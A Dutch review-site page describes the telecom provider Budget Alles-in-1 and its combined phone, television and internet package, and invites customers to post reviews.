Je kunt wel televisie, internet en telefonie allemaal apart afsluiten, maar vaak is het, vooral als je toch alle diensten gebruikt, makkelijker om een pakket af te sluiten waarbij alles inbegrepen zit. Budget Alles-in-1 is één van de telecomproviders die zo’n pakket aanbiedt. Maar wat zal er allemaal in zo’n pakket zitten? Zul je hiermee echt goedkoper uit zijn? Zal het allemaal wel goed werken? Zal het makkelijk zijn om via de website van Budget Alles-in-1 een abonnement af te sluiten en over te stappen? En hoe zal de klantenservice van Budget Alles-in-1 reageren als het internet eruit ligt of je bepaalde zenders niet meer kunt ontvangen? Dat en meer kunnen echte klanten van Budget Alles-in-1 je allemaal vertellen. Lees hun reviews om een beter beeld van deze telecomprovider te krijgen. Hun cijfers, meningen, beoordelingen en ervaringen kunnen je laten zien wat je als klant van Budget Alles-in-1 kunt en mag verwachten.

Over Budget Alles-in-1
Budget Alles-in-1 is een telecomprovider. Het bedrijf bestaat al sinds 2016 als Nederlandse Energie Maatschappij maar ze doen nog veel meer. Ze zijn deel van Budget Alles-in-1 maar hier gaat het specifiek over hun alles-in-1-pakket. Zo’n pakket houdt in dat alle diensten die je van een telecomprovider apart kunt afsluiten nu samen in één pakket zitten. Er zit telefonie in zodat je gewoon via de telefoon bereikbaar kunt zijn. Je hebt de keuze uit vier verschillende bundels naast de Standaard Telefonie die er altijd bijzit. Er is Bellen Onbeperkt Mobiel, Bellen Onbeperkt Buitenland en Bellen Onbeperkt Vast. Dus of je nou meer gebruik maakt van je smartphone of juist je vaste telefoon, er is vast wel een bundel voor. Naast telefonie hebben ze dan ook nog televisie. Het basispakket van KPN dat Budget Alles-in-1 aanbiedt geeft je toegang tot al 100 verschillende televisiezenders en radiozenders. Je kunt ook kiezen voor een extra pakket met nog eens meer dan 10 zenders. En dan heeft Budget Alles-in-1 natuurlijk nog internet. Ook hiervoor heeft Budget Alles-in-1 verschillende opties. Of je nou een koperaansluiting wilt of gaat voor glasvezel, het is allemaal mogelijk.


Diensten van Alles-in-1
Via de website van Budget Alles-in-1 kun je een abonnement afsluiten op hun pakket. Ze willen graag je postcode, huisnummer en huidige aanbieder weten. Ook is het handig voor ze om te weten of je al energieklant bent bij Budget Alles-in-1 zodat ze je gegevens er eventueel bij kunnen pakken en je geen heel nieuw account hoeft aan te maken. Verder is er nog een Budget Alles-in-1 klantenservice die je kan helpen als je er even zelf niet helemaal uitkomt of één van hun diensten het ineens niet meer goed doet.

Klachren, Complimenten en Tips voor Budget Alles-in-1
Heb jij al een abonnement van Budget Alles-in-1? Dan horen wij graag alles over jouw ervaring met deze telecomprovider. Hoe goed is de ontvangst van de televisiezenders? Heb je altijd internet of ligt het er vaak uit? Ben je inderdaad goedkoper uit dan wanneer je alles apart afsluit? En kon je bij de Budget Alles-in-1 klantenservice terecht toen iets het niet goed deed? Laat je eigen Budget Alles-in-1 review achter en vertel ons wat jouw mening over deze telecomprovider is.

}